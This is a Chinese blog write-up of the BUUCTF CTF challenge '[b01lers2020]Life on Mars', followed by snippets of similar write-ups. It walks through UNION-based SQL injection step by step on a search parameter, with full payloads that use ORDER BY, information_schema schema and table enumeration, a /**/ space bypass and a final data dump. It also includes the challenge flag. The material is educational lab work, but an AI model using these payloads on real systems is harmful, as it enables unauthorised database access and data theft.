BUUCTF-[b01lers2020]Life on Mars 1

原创 于 2024-11-10 17:30:26 发布 · 371 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #web

打开题目

左边一堆可点的都是一些没什么用的科普,没有任何信息,目录遍历也没有什么也有用的信息,bp抓两个包看看

抓第一个Home的包很正常,抓后边几个包的时候发现有一个搜索的地方/query?search=

在/query?search=后面加上正确的地名会回显,像是一个sql注入的地方

尝试判断列数:/query?search=olympus_mons order by 2,发现有两列

然后判断一下注入点:/query?search=olympus_mons union select 1,2

查查版本和库名

在查库名这里有个坑,查出来的这个库中的所有表和字段信息都没有flag的,当时一个一个查,查出来的东西都没什么用,废了好长时间。什么有用的信息都没有,回过头来重新查查有没有其他的数据库

/query?search=olympus_mons union select 1,group_concat(database()) from

information_schema.schemata

有意思的来了,这一查发现竟然有三个一样的数据库,那怎么办呢,sql语句里边还有一种查看所有数据库的方法,把里边的database()改成schema_name

/query?search=olympus_mons union select 1,group_concat(schema_name) from

information_schema.schemata

这两种一个是获取当前数据库命称,一种是使用information_schema.schemata表中的schema_name列来获取数据库名称,回显出来的数据的名称是不一样的,建议以后查找其他数据库,默认使用 union select group_concat(schema_name) from information_schema.schemata,来节省时间。

这下我们得到了其他的数据库的名称,查一下alien_code这个数据库

查表:/query?search=olympus_mons union select 1,group_concat(table_name) from information_schema.tables where table_schema='alien_code'

查列:/query?search=olympus_mons union select 1,group_concat(column_name) from information_schema.columns where table_name='code'

查字段内容:/query?search=olympus_mons union select group_concat(id),group_concat(code) from alien_code.code

得到flag

flag{1654f6eb-fce8-41d3-9e18-b014e66acf24}

diandian~
关注
BUUCTF__[b01lers2020]Life on Mars_题解
风过江南乱的博客
05-06 1023
BUUCTF [b01lers2020]Life on Mars sql联合注入
[b01lers2020]Life on Mars 一个接口的sql schema.schemate表
m0_64180167的博客
12-07 640
太多了 不切实际一个一个查 看看有没有其他数据库。然后如果正确就会返回值 否则 返回1。发现传递参数 直接尝试sql。发现回显 直接开始注入。
BUUCTF-[b01lers2020]Life on Mars
qq_24033605的博客
11-04 3063
[b01lers2020]Life on Mars 审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。 利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳 找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。 爆破数据库名 union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s
BUUCTF:[b01lers2020]Life on Mars
末初 · mochu7
08-01 2576
题目地址:https://buuoj.cn/challenges#[b01lers2020]Life%20on%20Mars 一个关于火星生命的科普站,目录扫描啥都没发现,用burp抓两个包分析一下,发现几个可疑传参 /query?search=如果地名输入正确,发现返回如下 order by判断字段,2字段时回显正确 union联合查询:/query?search=amazonis_planitia union select 111,222 回显点如图所示: 查库:/query?search=a
[b01lers2020]Life on Mars1
mlws1900的博客
08-21 339
search=这个参数一直在发生改变。可以发现它返回了json格式的数据,猜测是sql注入。放进hackbar进行操作。后面就是sql注入一梭子。orderby进行判断。看到回显点,进行查询。
BUUCTF [b01lers2020]little_engine
weixin_53349587的博客
01-06 561
1.拿到文件,进入主函数: 这个是动调之前的主函数,开始动调: 其中,已知字符串已经给出,为unk_5617CE521220,一共300位: 进入加密函数sub_5608DAAB8510: 通过多次动态调试,得到了加密算法的逻辑。 看判断函数sub_5608DAAB85A0: 综上,写出加密脚本: a = [0xE1, 0xE6, 0xD0, 0x4A, 0xF2, 0xC3, 0x7E, 0xAA, 0xE6, 0xFC, 0x42, 0xB2, 0xF..
BUUCTF-CRYPTO-[b01lers2020]safety_in_numbers
zippo1234的博客
10-26 1150
BUUCTF-CRYPTO-[b01lers2020]safety_in_numbers[b01lers2020]safety_in_numbers题目分析开始1.题目2.分析(1)pubkey.pem(2)小端存储(3)解法3.上脚本:4.get flag结语 每天一题,只能多不能少 [b01lers2020]safety_in_numbers 题目分析 1.pub.pem读取 2.n很大,或者说m^e相比于n很小。 开始 1.题目 给了三个文件 pubke.pem储存了n和e。 flag.enc是加密
[b01lers2020]Life on Mars 1
m0_73728268的博客
04-02 198
sqlmap
[b01lers2020]Life on Mars
fmyyy1的博客
05-06 313
点击抓包 看到对文件的请求。刚开始以为是文件读取,试了半天发现没啥用,只能转一下思路 测试后是sql注入。 order by之后是两列 在响应页面的最下面有我们注入的回显。,而且没有一点过滤,整数型注入。放最后的注入 amazonis_planitia union select 1,group_concat(id,code) from alien_code.code ...
b01lers-ctf-2020:b01lers-ctf的公开发布文件
05-17
b01lers-ctf b01lers-ctf的公开发布文件。 您将找到以下目录: rev:Rev的挑战 pwn:Pwn挑战 加密:加密挑战 网络:网络挑战 杂项:其他挑战 分布式文件:我们在CTF期间分发供下载的tgz文件 以及比赛的比分牌。 所有挑战都应具有挑战文件,源代码以及编写和/或求解器。 如果没有,请创建一个github问题,我们将修复该问题。 如果您需要更多帮助,请随时与b01lers-ctf discord上的DM创建者联系。 没有承诺,他们会回应,我们很忙。
BUUCTF--[b01lers2020]Life on Mars
qq_46263951的博客
07-22 649
进入页面后什么也没发现,通过抓包看到一个可以参数 跟着参数走可以看到一个这样的页面 看大佬的wp接下来使用联合查询进行探测 当查询两个字段时可以正常显示 /query?search=amazonis_planitia union select 1,2 使用sqlmap扫描 扫描到这几个库,看名字应该是在alien_code中 扫描该库的表 扫描该表的列名 然后使用sqlmap --dump 不出来内容,只好手动 成功获得flag...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值